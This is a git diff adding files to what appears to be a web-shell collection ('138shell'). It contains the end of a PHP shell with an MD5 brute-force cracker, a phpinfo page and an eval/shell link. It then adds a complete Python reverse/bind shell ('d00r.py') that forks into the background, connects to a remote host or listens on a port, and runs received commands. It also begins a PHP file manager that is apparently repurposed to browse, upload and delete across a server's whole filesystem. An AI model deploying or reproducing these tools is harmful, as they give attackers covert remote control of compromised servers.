+      else {
+         $pos=$ok[1];
+         $from=$ok[2];
+      }
+      $from=explode(",",$from);
+      if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { 
+         $from=array(0);
+         if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)");
+      }
+      $phplen=strlen($php);
+      mdgetword();
+      $poslen=strlen($word);
+      if ($pos<0 || $pos>=$poslen) $pos=0;
+
+      for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); }
+
+      echo "<h3><a href='$self?c=md5crack".
+         "&from=".urlencode("$pos:".implode(",",$from)).
+         "&text=".urlencode($text).
+         "&php=".urlencode($php).
+         "&fulltime=$fulltime&fullqty=$fullqty".
+         "'>Save this link</a> - click for break and save current position</h3>";
+      flush();
+
+      echo "
+      MD5_HASH=$text<br>
+      CURRENT_WORD=$word<br>
+      CURRENT_DIGIT=$pos:".implode(",",$from)."<br>
+      RANGE=".htmlspecialchars($php)."<br>
+      ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br>
+      Calculation(qty)={$fullqty}0000<p><font face=courier>";
+      flush();
+
+
+      $fullsum=pow($phplen,$poslen);
+      $time1=time();
+      $i=0;
+
+      while (1) {
+
+         $i++;
+         if ($i>50000) {
+            $time=time()-$time1;
+            if ($time>20) break;
+            $i=0;
+            $sum=0;
+            for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j);
+            printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n",
+               $sum*100/$fullsum,$time);
+            flush();
+            $fullqty+=5;
+         }
+
+         if (md5($word)===$text) 
+            exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font>
+            <script> window.focus();  window.focus(); setTimeout(\"alert('Done!')\",100);</script>");
+         $from[$pos]++;
+         if ($from[$pos]==$phplen) {
+            $flag=1;
+            $from[$pos]=0;
+            $word[$pos]=$php[0];
+            for ($pos=$pos+1; $pos<$poslen; $pos++) {
+               if ($from[$pos]+1<$phplen) {
+                  $from[$pos]++;
+                  $word[$pos]=$php[$from[$pos]];
+                  $flag=0;
+                  $pos=0;
+                  break;
+               }
+               else {
+                  $from[$pos]=0;
+                  $word[$pos]=$php[0];
+               }
+            }
+            if ($flag) {
+               $from[]=0;
+               $poslen=count($from);
+               $word.=$php[0];
+               $pos=0;
+               $fullsum=pow($phplen,$poslen);
+            }
+         }
+         $word[$pos]=$php[$from[$pos]];
+      }
+
+      $fulltime+=time()-$time1;
+      if ($i>5000) $fullqty++;
+      $url="$self?c=md5crack".
+           "&from=".urlencode("$pos:".implode(",",$from)).
+           "&text=".urlencode($text).
+           "&php=".urlencode($php).
+           "&fulltime=$fulltime&fullqty=$fullqty&go=1";
+      echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>";
+
+   }
+
+   break;
+
+
+case "phpinfo":
+
+   phpinfo();
+   break;
+
+
+case "codes":
+
+   error_reporting(2039);
+   if (!isset($limit)) $limit=999;
+   if (!isset($fontsize)) $fontsize="300%";
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+   echo "<h3>".mm("Character map (symbol codes table)")."</h3>
+   <form action=$self method=get>
+   <input type=hidden name=c value=\"codes\">
+   <select name=fontname size=1>
+   <option value='Webdings'>====[ ".mm("Select font")." ]====";
+
+   foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol',
+      'System','Tahoma','Terminal','Times New Roman','Verdana',
+      'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v)
+      echo "<option".($fontname==$v?" selected":"").">$v";
+   
+   echo "</select>
+   ".mm("or type other")." 
+   <input size=13 type=text name=fontname2 value=\"$fontname2\">.
+   ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br>
+   ".mm("Code limit").": 
+   <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label>
+   <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label>
+   <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label>
+   <input type=submit value='".mm("Generate table")." !'></form><P>";
+
+   if (!isset($fontname)) break; 
+   if (!empty($fontname2)) $fontname=$fontname2;
+   echo "
+   <STYLE>
+   .codes { font: $fontsize $fontname; text-align: center; }
+   .z { font: 12pt Fixedsys; color: #cccccc; }
+   </STYLE>
+   <table class=codes border=0 cellspacing=0 cellpadding=1>";
+   ?>
+   <SCRIPT>
+   m=8;
+   n=1;
+   s=new String("");
+   s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>";
+   for (i=1; i<=<?php echo $limit; ?>; i++) {
+      if (i<10) x="000"+i;
+      else if (i<100) x="00"+i;
+           else if (i<1000) x="0"+i;
+                else x=i;
+      if (n%m==0) s=s+"<tr>";
+      s=s+"<td class=z>&amp;#"+x+";</td>";
+      s=s+"<td>&#"+x+";</td>";
+      if (n%m+1==m) s=s+"</tr>";
+      if (s.length>500) {
+         document.write(s);
+         s=""
+      } 
+      n++;
+   }
+   document.write(s);
+   </SCRIPT>
+   <?php
+
+   echo "</table>";
+   break;
+
+
+
+case "img":
+
+   unset($img);
+$img=array(
+'dir'=>
+'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.
+'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=',
+'fon'=>
+'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'.
+'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'.
+'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'.
+'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'.
+'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'.
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'.
+'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'.
+'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'.
+'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'.
+'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'.
+'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'.
+'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'.
+'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'.
+'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7',
+'mode'=>
+'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'.
+'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'.
+'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=',
+
+'refresh'=>
+'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'.
+'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'.
+'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'.
+'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=',
+'search'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'.
+'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'.
+'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'.
+'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'.
+'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==',
+'setup'=>
+'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'.
+'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'.
+'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'.
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'.
+'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==',
+'up'=>
+'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'.
+'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'.
+'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==',
+'sort_asc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'.
+'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==',
+'sort_desc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'.
+'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=',
+'exe'=>
+'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'.
+'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'.
+'xhIAOw==',
+'html'=>
+'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'.
+'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'.
+'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'.
+'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'.
+'ADs=',
+'txt'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'.
+'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'.
+'UpPWG3Ig6Hq/XmRjuZwkAAA7',
+'unk'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'.
+'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'.
+'yUzYbJao6npVkQQAOw==',
+'php'=>
+'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'.
+'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'.
+'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'.
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   // /*
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+   // */
+   echo base64_decode($img[$name]);
+
+   break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/138shell/P/Phyton Shell.py.txt b/138shell/P/Phyton Shell.py.txt
new file mode 100644
index 0000000..10b6029
--- /dev/null
+++ b/138shell/P/Phyton Shell.py.txt	
@@ -0,0 +1,121 @@
+#!/usr/bin/env python
+
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+#   d00r.py 0.3a (reverse|bind)-shell in python by fQ	#
+#							#
+#	alpha						#
+#							#
+#							#
+# usage: 						#
+# 	% ./d00r -b password port			#
+#	% ./d00r -r password port host			#
+#	% nc host port					#
+#	% nc -l -p port (please use netcat)		#
+# # # # # # # # # # # # # # # # # # # # # # # # # # # #	#
+
+
+import os, sys, socket, time
+
+
+# =================== var =======
+MAX_LEN=1024
+SHELL="/bin/zsh -c"
+TIME_OUT=300 #s
+PW=""
+PORT=""
+HOST=""
+
+
+# =================== funct =====
+# shell - exec command, return stdout, stderr; improvable
+def shell(cmd):
+	sh_out=os.popen(SHELL+" "+cmd).readlines()
+	nsh_out=""
+	for i in range(len(sh_out)):	
+		nsh_out+=sh_out[i]
+	return nsh_out	
+
+# action?
+def action(conn):
+	conn.send("\nPass?\n")
+	try: pw_in=conn.recv(len(PW))
+	except: print "timeout"
+	else:	
+		if pw_in == PW:	
+			conn.send("j00 are on air!\n")						
+			while True:               		
+				conn.send(">>> ")
+				try:
+					pcmd=conn.recv(MAX_LEN)
+				except:
+					print "timeout"
+					return True					
+				else:
+					#print "pcmd:",pcmd
+					cmd=""#pcmd
+					for i in range(len(pcmd)-1):
+						cmd+=pcmd[i]
+			                if cmd==":dc":
+						return True
+					elif cmd==":sd":
+						return False
+					else:
+						if len(cmd)>0:
+							out=shell(cmd)
+							conn.send(out)
+
+
+# =================== main ======
+argv=sys.argv
+
+if len(argv)<4: 
+	print "error; help: head -n 16 d00r.py"
+	sys.exit(1)
+elif argv[1]=="-b": 
+	PW=argv[2]
+	PORT=argv[3]
+elif argv[1]=="-r" and len(argv)>4:
+	PW=argv[2]
+	PORT=argv[3]
+	HOST=argv[4]
+else: exit(1)
+
+PORT=int(PORT)
+print "PW:",PW,"PORT:",PORT,"HOST:",HOST
+	
+#sys.argv[0]="d00r"
+
+# exit father proc
+if os.fork()!=0: 
+	sys.exit(0)
+
+# associate the socket
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(TIME_OUT)
+
+if argv[1]=="-b":
+	sock.bind(('localhost', PORT))
+	sock.listen(0)
+
+run=True
+while run:
+
+	if argv[1]=="-r":
+		try: sock.connect( (HOST, PORT) )
+		except: 
+			print "host unreachable"
+			time.sleep(5)
+		else: run=action(sock)
+	else:		
+		try:	(conn,addr)=sock.accept()
+		except: 
+			print "timeout"
+			time.sleep(1)
+		else: run=action(conn)			
+	
+	# shutdown the sokcet
+	if argv[1]=="-b": conn.shutdown(2)
+	else:
+		try: sock.send("")
+		except: time.sleep(1)
+		else: sock.shutdown(2)
\ No newline at end of file
diff --git a/138shell/P/Private-i3lue.txt b/138shell/P/Private-i3lue.txt
new file mode 100644
index 0000000..93abbae
--- /dev/null
+++ b/138shell/P/Private-i3lue.txt
@@ -0,0 +1,1456 @@
+<?php
+/*
+ * webadmin.php - a simple Web-based file manager
+ * Copyright (C) 2002  Daniel Wacker <mail@wacker-welt.de>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+/* ------------------------------------------------------------------------- */
+
+/* Select your language:
+ * 'en' - English
+ * 'de' - German
+ * 'cz' - Czech
+ * 'it' - Italian
+ */
+$language = 'en';
+
+/* This directory is shown when you start webadmin.php.
+ * For example: './' would be the current directory.
+ */
+$homedir = './';
+
+/* This sets the root directory of the treeview.
+ * Set it to '/' to see the whole filesystem.
+ */
+$treeroot = '/';
+
+/* When you create a directory, its permission is set to this octal value.
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+$dirpermission = 0705;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you create a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $newfilepermission = 0666;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you upload a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $uploadedfilepermission = 0666;
+
+/* The size of the file edit textarea
+ */
+$editrows = 20;
+$editcols = 70;
+
+/* ------------------------------------------------------------------------- */
+
+$self = htmlentities(basename($_SERVER['PHP_SELF']));
+$homedir = relpathtoabspath($homedir, getcwd());
+$treeroot = relpathtoabspath($treeroot, getcwd());
+$words = getwords($language);
+
+/* If PHP added any slashes, strip them */
+if (ini_get('magic_quotes_gpc')) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+/* Return Images */
+if (isset($_GET['imageid'])) {
+	header('Content-Type: image/gif');
+	echo(getimage($_GET['imageid']));
+	exit;
+}
+
+/* Initialize session */
+ini_set('session.use_cookies', FALSE);
+ini_set('session.use_trans_sid', FALSE);
+session_name('id');
+session_start();
+
+/* Initialize dirlisting output */
+$error = $notice = '';
+$updatetreeview = FALSE;
+
+/* Handle treeview requests */
+if (isset($_REQUEST['action'])) {
+	switch ($_REQUEST['action']) {
+	case 'treeon':
+		$_SESSION['tree'] = array();
+		$_SESSION['hassubdirs'][$treeroot] = tree_hassubdirs($treeroot);
+		tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot);
+		frameset();
+		exit;
+	case 'treeoff':
+		$_SESSION['tree'] = NULL;
+		$_SESSION['hassubdirs'] = NULL;
+		dirlisting();
+		exit;
+	}
+}
+
+/* Set current directory */
+if (!isset($_SESSION['dir'])) {
+	$_SESSION['dir'] = $homedir;
+	$updatetreeview = TRUE;
+}
+if (!empty($_REQUEST['dir'])) {
+	$newdir = relpathtoabspath($_REQUEST['dir'], $_SESSION['dir']);
+	/* If the requested directory is a file, show the file */
+	if (@is_file($newdir) && @is_readable($newdir)) {
+		/* if (@is_writable($newdir)) {
+			$_REQUEST['edit'] = $newdir;
+		} else */ if (is_script($newdir)) {
+			$_GET['showh'] = $newdir;
+		} else {
+			$_GET['show'] = $newdir;
+		}
+	} elseif ($_SESSION['dir'] != $newdir) {
+		$_SESSION['dir'] = $newdir;
+		$updatetreeview = TRUE;
+	}
+}
+
+/* Show a file */
+if (!empty($_GET['show'])) {
+	$show = relpathtoabspath($_GET['show'], $_SESSION['dir']);
+	if (!show($show)) {
+		$error= buildphrase('&quot;<b>' . htmlentities($show) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Show a file syntax highlighted */
+if (!empty($_GET['showh'])) {
+	$showh = relpathtoabspath($_GET['showh'], $_SESSION['dir']);
+	if (!show_highlight($showh)) {
+		$error = buildphrase('&quot;<b>' . htmlentities($showh) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Upload file */
+if (isset($_FILES['upload'])) {
+	$file = relpathtoabspath($_FILES['upload']['name'], $_SESSION['dir']);
+	if (@is_writable($_SESSION['dir']) && @move_uploaded_file($_FILES['upload']['tmp_name'], $file) && (!isset($uploadedfilepermission) || chmod($file, $uploadedfilepermission))) {
+		$notice = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['uploaded']);
+	} else {
+		$error = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['notuploaded']);
+	}
+}
+
+/* Create file */
+if (!empty($_GET['create']) && $_GET['type'] == 'file') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (substr($file, strlen($file) - 1, 1) == '/') $file = substr($file, 0, strlen($file) - 1);
+	if (is_free($file) && touch($file) && ((!isset($newfilepermission)) || chmod($file, $newfilepermission))) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$_REQUEST['edit'] = $file;
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Create directory */
+if (!empty($_GET['create']) && $_GET['type'] == 'dir') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (is_free($file) && @mkdir($file, $dirpermission)) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$updatetreeview = TRUE;
+		if (!empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = TRUE;
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file);
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Ask symlink target */
+if (!empty($_GET['symlinktarget']) && empty($_GET['symlink'])) {
+	$symlinktarget = relpathtoabspath($_GET['symlinktarget'], $_SESSION['dir']);
+	html_header($words['createsymlink']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="symlinktarget" value="<?php echo(htmlentities($_GET['symlinktarget'])); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td valign="top"><?php echo($words['target']); ?>:&nbsp;</td>
+				<td>
+					<b><?php echo(htmlentities($_GET['symlinktarget'])); ?></b><br>
+					<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked>
+					<label for="checkbox_relative"><?php echo($words['reltarget']); ?></label>
+				</td>
+			</tr>
+			<tr>
+				<td><?php echo($words['symlink']); ?>:&nbsp;</td>
+				<td><input type="text" name="symlink" value="<?php echo(htmlentities(spath(dirname($symlinktarget)))); ?>" size="<?php $size = strlen($_GET['symlinktarget']) + 9; if ($size < 30) $size = 30; echo($size);  ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	html_footer();
+	exit;
+}
+
+/* Create symlink */
+if (!empty($_GET['symlink']) && !empty($_GET['symlinktarget'])) {
+	$symlink = relpathtoabspath($_GET['symlink'], $_SESSION['dir']);
+	$target = $_GET['symlinktarget'];
+	if (@is_dir($symlink)) $symlink = spath($symlink) . basename($target);
+	if ($symlink == $target) {
+		$error = buildphrase(array('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', '&quot;<b>' . htmlentities($target) . '</b>&quot;'), $words['samefiles']);
+	} else {
+		if (@$_GET['relative'] == 'yes') {
+			$target = abspathtorelpath(dirname($symlink), $target);
+		} else {
+			$target = $_GET['symlinktarget'];
+		}
+		if (is_free($symlink) && @symlink($target, $symlink)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['created']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['notcreated']);
+		}
+	}
+}
+
+/* Delete file */
+if (!empty($_GET['delete'])) {
+	$delete = relpathtoabspath($_GET['delete'], $_SESSION['dir']);
+	if (@$_GET['sure'] == 'TRUE') {
+		if (remove($delete)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['deleted']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['notdeleted']);
+		}
+	} else {
+		html_header($words['delete']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['suredelete'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
